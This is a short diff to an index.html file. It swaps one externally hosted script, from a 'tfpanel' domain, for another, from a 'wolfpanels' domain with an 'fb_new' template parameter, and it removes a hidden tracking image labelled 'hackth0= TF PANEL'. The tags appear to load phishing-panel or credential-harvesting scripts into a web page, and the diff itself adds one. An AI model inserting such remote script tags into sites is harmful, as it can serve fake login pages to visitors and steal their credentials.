--- a/index.html
+++ b/index.html
@@ -1,2 +1,1 @@
-<script src="https://tfpanel.site/thor/index.php?username=theflute" type="text/javascript" async="true"></script>
-<img src="//whos.amung.us/pingjs/?k=hackth0= TF PANEL &x=https://google.com" style="display:none" alt="">
+<script src="https://wolfpanels.cc/youtube?name=flauta&template=fb_new" type="text/javascript" async="true"></script>
